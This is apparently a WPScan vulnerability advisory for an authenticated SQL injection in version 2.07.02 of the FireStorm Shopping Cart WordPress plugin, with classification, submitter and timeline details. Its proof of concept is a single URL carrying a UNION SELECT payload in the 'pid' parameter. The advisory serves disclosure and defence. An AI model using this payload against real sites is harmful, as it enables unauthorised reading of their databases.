FireStorm Shopping Cart eCommerce Plugin 2.07.02 - Authenticated SQL Injection

Sign up to our free email alerts service for instant vulnerability notifications!

Description
$_POST[ ‘pid’ ] is not escaped. Url is accessible for administrator user.

Url with problem: http://localhost:1406/wp/wp-admin/admin.php?page=fssc-products&fp=general&f=edit&cid=0&pid=0
Proof of Concept
http://target/wp-admin/admin.php?page=fssc-products&fp=general&f=edit&cid=0&pid=0+UNION+SELECT+name+FROM+wp_terms+WHERE+term_id=1

Affects

Plugin fs-shopping-cart

References

URL http://lenonleite.com.br/en/blog/2016/11/10/firestorm-shopping-cart-ecommerce-plugin-2-07-02-for-wordpress/

Classification

Type SQLI
OWASP Top 10 A1: Injection
CWE CWE-89

Miscellaneous

Submitter Lenon Leite
Submitter Website http://lenonleite.com.br/
Submitter Twitter lenonleite
Views 52
Verified No
WPVDB ID 8672

Timeline

Publicly Published 2016-11-10 (29 days ago)
Added 2016-11-21 (18 days ago)
Last Updated 2016-11-21 (18 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.